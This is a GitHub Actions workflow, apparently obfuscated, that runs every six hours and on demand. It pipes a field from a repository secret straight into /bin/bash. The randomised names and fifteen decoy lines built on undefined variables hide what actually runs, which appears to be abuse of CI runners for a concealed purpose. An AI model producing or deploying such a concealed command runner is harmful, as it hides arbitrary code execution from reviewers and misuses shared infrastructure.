name: guoxunsu6789

on:
  workflow_dispatch:
  schedule:
    - cron: '22 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: guoxunsu6789
        env:
          h6: ${{ secrets.h6 }}
        run: |
          echo $h6 | jq -r .jk92 | /bin/bash
          echo $dqp8479 | jq -r .nfq1970 | /bin/bash
          echo $imcc435 | jq -r .kkbnl230 | /bin/bash
          echo $bdhi78 | jq -r .hifc56943 | /bin/bash
          echo $x4 | jq -r .xjjdp377 | /bin/bash
          echo $xsr17944 | jq -r .bbpd8777 | /bin/bash
          echo $io69034 | jq -r .vkn2145 | /bin/bash
          echo $wi2429 | jq -r .utcoa9 | /bin/bash
          echo $nxt10697 | jq -r .nincv772 | /bin/bash
          echo $cjvcy30707 | jq -r .fdats9422 | /bin/bash
          echo $ynz697 | jq -r .ikmgv4 | /bin/bash
          echo $w9624 | jq -r .e7 | /bin/bash
          echo $dwtjv7 | jq -r .iggl690 | /bin/bash
          echo $y60922 | jq -r .gb419 | /bin/bash
          echo $japox70 | jq -r .er67175 | /bin/bash
          echo $b42569 | jq -r .h7 | /bin/bash

